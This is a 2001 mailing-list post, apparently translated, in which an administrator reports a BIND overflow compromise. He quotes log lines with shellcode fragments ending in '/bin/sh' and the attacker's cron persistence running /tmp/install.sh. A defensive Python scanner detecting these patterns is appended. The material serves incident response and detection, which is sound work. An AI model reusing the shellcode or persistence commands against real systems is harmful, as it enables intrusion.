Hack

Vladimir Rengevic grafon at nextra.sk
Sunday 14 January 2001 11:45:48 CET


Good day, everyone!

I have a small problem - a server was hacked right under my hands (luckily it was
a freshly installed experimental box, so I'll only lose some time reinstalling,
nothing more).
The guy apparently didn't count on me checking the log every 30 seconds ;-)

For the future, I'd just like to ask whether there is already a defence against this.
It's running named 8.2.2-P5 (well, after this experience it'll be the newest one I
can find).

It happened like this - a classic stack overflow (or buffer overflow?), simply
overfilling the input line - X attempts:

Jan 14 09:51:07 ns SERVER[1065]: Dispatch_input: bad request line
'BBðBB¿BB¿BB¿óBB¿
XXXXXXXXXXXXXXXXXX000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000
00
0000000000000000000000000000000000000000000000000004800001347270610000000000
000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000135022648000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000003221224720




1Û1É1À°FÍ??å1Ò²f?Ð1É?ËC?]øC?]ôK?Mü«M
ôÍ?1É?EôCf?]fÇEî^O'Mð«EEøÆEü^P?ЫMôÍ??ÐCCÍ??

Jan 14 09:51:07 ns SERVER[1066]: Dispatch_input: bad request line
'BB^HüB¿^IüB¿'



and then (again X times, until he succeeded):

Jan 14 09:51:12 ns SERVER[1100]: Dispatch_input: bad request
line 'BBðûB¿ûB¿ûB¿óûB¿XXXXXXXXXXXXXXXXXX000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000
0000048security.00000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000134727061




1Û1É1À°FÍ??å1Ò²f?Ð1É?ËC?]øC?]ôK?Mü«
MôÍ?1É?EôCf?]fÇEî^O'Mð«EEøÆEü^P?ЫMôÍ??ÐCCÍ??ÐCÍ??Ã1ɲ??ÐÍ??
ÐAÍ?ë^X^?u^H1ÀˆF^G?E^L°^K?ó«M^H«U^LÍ?èãBBB/bin/sh'

(the lines are wrapped)

and finally he installed this:

Jan 14 09:59:58 ns crontab[1710]: (root) LIST (root)

Jan 14 09:59:58 ns crontab[1711]: (root) REPLACE (root)

Jan 14 10:00:00 ns CROND[1715]: (root) CMD ( /sbin/rmmod -as)

Jan 14 10:00:00 ns CROND[1716]: (root) CMD (/tmp/install.sh >/dev/null
2>/dev/null)

Jan 14 10:00:00 ns crontab[1718]: (root) LIST (root)

Jan 14 10:00:00 ns crontab[1720]: (root) REPLACE (root)

Jan 14 10:01:00 ns crond[778]: (root) RELOAD (cron/root)

Jan 14 10:01:00 ns CROND[1725]: (root) CMD (run-parts /etc/cron.hourly)


So, basically, he added these lines to the crontab:

# sysstat
0 * * * 0,6 /usr/lib/sa/sa1 600 6 &
5 19 * * * /usr/lib/sa/sa2 -A &

I didn't find out anything more, but I'm reinstalling it anyway :-(

I'd just be interested in the opinion of more experienced people on security. This
is the first time it has happened to me; I've had a leased line for about 2 weeks,
the main company server has been on it for about 5 days (lucky that nobody has
noticed it yet) and this test machine was there for about 3 hours. Otherwise it's
RedHat 7.0 exactly as installed from the CD. I didn't get around to the updates :-(.



Vlado
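An added example, not part of the post or of the mailing list: a small Python scanner that applies the two things visible in the log excerpt above as detection rules. It flags `Dispatch_input: bad request line` entries whose payload contains non-printable bytes, long runs of filler characters or an embedded `/bin/sh` string, and it flags a root crontab REPLACE followed shortly by a CROND job launched from a world-writable directory such as /tmp. The sample log is constructed here, modelled on the quoted lines, with the shellcode bytes written as `\x` escapes so the file stays plain text; the program names (`SERVER`, `crontab`, `CROND`), the `(user) REPLACE (user)` and `(user) CMD (...)` message formats and the 120-second correlation window are taken from the excerpt or are assumptions of this example.

```python
import re
from datetime import datetime

# Constructed sample log, modelled on the syslog excerpt in the post above.
# Shellcode bytes are written as \x escapes so this file stays plain text.
SAMPLE_LOG = [
    "Jan 14 09:51:07 ns SERVER[1065]: Dispatch_input: bad request line 'BB\xf0BB\xbf"
    + "X" * 18 + "0" * 120 + "1\xdb1\xc91\xc0\xb0F\xcd\x80'",
    "Jan 14 09:51:07 ns SERVER[1066]: Dispatch_input: bad request line 'BB\x08\xfcB\xbf'",
    "Jan 14 09:51:12 ns SERVER[1100]: Dispatch_input: bad request line 'BB"
    + "X" * 18 + "0" * 200 + "/bin/sh'",
    "Jan 14 09:52:30 ns SERVER[1101]: Dispatch_input: bad request line 'hello'",  # benign
    "Jan 14 09:59:58 ns crontab[1710]: (root) LIST (root)",
    "Jan 14 09:59:58 ns crontab[1711]: (root) REPLACE (root)",
    "Jan 14 10:00:00 ns CROND[1715]: (root) CMD ( /sbin/rmmod -as)",
    "Jan 14 10:00:00 ns CROND[1716]: (root) CMD (/tmp/install.sh >/dev/null 2>/dev/null)",
    "Jan 14 10:01:00 ns CROND[1725]: (root) CMD (run-parts /etc/cron.hourly)",
]

SYSLOG_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) (\S+) ([^\[\s]+)\[(\d+)\]: (.*)$")
BAD_REQ_RE = re.compile(r"Dispatch_input: bad request line '(.*)'$", re.DOTALL)
CRON_CMD_RE = re.compile(r"^\((\w+)\) CMD \((.*)\)$")
CRON_REPLACE_RE = re.compile(r"^\((\w+)\) REPLACE \((\w+)\)$")
# Directories any local user can write to; a root cron job starting from one
# of them is worth a look (assumed list for this example).
WORLD_WRITABLE_RE = re.compile(r"(?:^|[\s(])/(?:tmp|var/tmp|dev/shm)/")


def parse_ts(s):
    # syslog carries no year; the default year 1900 is fine for differences within one log
    return datetime.strptime(s, "%b %d %H:%M:%S")


def longest_run(s):
    """Length of the longest run of one repeated character (NOP sleds / filler)."""
    best = run = 0
    for i, ch in enumerate(s):
        run = run + 1 if i and s[i - 1] == ch else 1
        best = max(best, run)
    return best


def payload_indicators(payload):
    """Return the reasons a logged request payload looks like an overflow attempt."""
    reasons = []
    nonprint = sum(1 for ch in payload if not 32 <= ord(ch) < 127)
    if nonprint:
        reasons.append(f"{nonprint} non-printable bytes")
    run = longest_run(payload)
    if run >= 32:
        reasons.append(f"filler run of {run} identical bytes")
    if "/bin/sh" in payload:
        reasons.append("embedded '/bin/sh' string")
    return reasons


def scan_syslog(lines, correlate_window_s=120):
    """Walk syslog lines in order and return a list of findings as dicts."""
    findings = []
    last_replace = None  # timestamp of the most recent root crontab REPLACE
    for line in lines:
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        ts_raw, _host, prog, pid, msg = m.groups()
        ts = parse_ts(ts_raw)
        bad = BAD_REQ_RE.search(msg)
        if bad:
            reasons = payload_indicators(bad.group(1))
            if reasons:
                findings.append({"kind": "overflow_attempt", "pid": int(pid),
                                 "detail": "; ".join(reasons)})
            continue
        rep = CRON_REPLACE_RE.match(msg)
        if rep and prog == "crontab" and rep.group(1) == "root":
            last_replace = ts
            findings.append({"kind": "root_crontab_replaced", "pid": int(pid), "detail": msg})
            continue
        cmd = CRON_CMD_RE.match(msg)
        if cmd and prog == "CROND" and WORLD_WRITABLE_RE.search(cmd.group(2)):
            detail = f"{cmd.group(1)} cron job runs from world-writable dir: {cmd.group(2)}"
            if last_replace is not None and (ts - last_replace).total_seconds() <= correlate_window_s:
                detail += " (crontab replaced %d s earlier)" % (ts - last_replace).total_seconds()
            findings.append({"kind": "cron_from_tmp", "pid": int(pid), "detail": detail})
    return findings


if __name__ == "__main__":
    for f in scan_syslog(SAMPLE_LOG):
        print(f"{f['kind']:<24} pid={f['pid']:<5} {f['detail']}")
```

Run against the sample, the scanner reports the three malformed request lines (the short second probe is caught only by its non-printable bytes, which is why that rule has no minimum count), the root crontab replacement, and the `/tmp/install.sh` job correlated to the replacement two seconds earlier; the `rmmod` and `run-parts` jobs and the printable `hello` request pass through untouched.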